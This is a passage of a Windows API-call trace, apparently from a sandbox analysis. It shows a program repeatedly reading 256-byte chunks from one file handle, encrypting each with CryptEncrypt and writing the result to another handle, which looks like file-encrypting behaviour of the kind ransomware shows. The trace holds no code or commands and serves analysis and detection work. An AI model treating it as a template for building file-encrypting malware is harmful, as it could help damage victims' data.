hFile=0x15b0, lpFileSize=0x2d7eb24 | out: lpFileSize=0x2d7eb24*=387971) returned 1 [0172.841] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7eb1c*=0x200, lpOverlapped=0x0) returned 1 [0172.842] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.858] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.858] GetLastError () returned 0x0 [0172.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.858] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.858] GetLastError () returned 0x0 [0172.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.858] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.858] GetLastError () returned 0x0 [0172.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.859] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.859] GetLastError () returned 0x0 [0172.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.859] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.859] GetLastError () returned 0x0 [0172.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.859] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.859] GetLastError () returned 0x0 [0172.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.859] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.859] GetLastError () returned 0x0 [0172.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.859] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.859] GetLastError () returned 0x0 [0172.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.860] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.860] GetLastError () returned 0x0 [0172.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.860] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.860] GetLastError () returned 0x0 [0172.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.860] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.860] GetLastError () returned 0x0 [0172.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.860] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.860] GetLastError () returned 0x0 [0172.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.861] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.861] GetLastError () returned 0x0 [0172.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.861] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.861] GetLastError () returned 0x0 [0172.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.861] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.861] GetLastError () returned 0x0 [0172.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.861] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.861] GetLastError () returned 0x0 [0172.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.941] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.941] GetLastError () returned 0x0 [0172.941] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.941] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.942] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.942] GetLastError () returned 0x0 [0172.942] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.942] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.942] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.942] GetLastError () returned 0x0 [0172.942] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.942] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.942] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.942] GetLastError () returned 0x0 [0172.942] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.942] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.942] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.942] GetLastError () returned 0x0 [0172.942] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.942] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.942] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.942] GetLastError () returned 0x0 [0172.942] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.943] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.943] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.943] GetLastError () returned 0x0 [0172.943] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.943] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.943] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.943] GetLastError () returned 0x0 [0172.943] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.943] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.943] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.943] GetLastError () returned 0x0 [0172.943] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.943] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.943] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.943] GetLastError () returned 0x0 [0172.943] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.943] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.944] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.944] GetLastError () returned 0x0 [0172.944] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.944] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.944] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.944] GetLastError () returned 0x0 [0172.944] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.944] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.944] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.944] GetLastError () returned 0x0 [0172.944] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.944] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.944] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.944] GetLastError () returned 0x0 [0172.944] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.944] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.944] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.944] GetLastError () returned 0x0 [0172.944] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 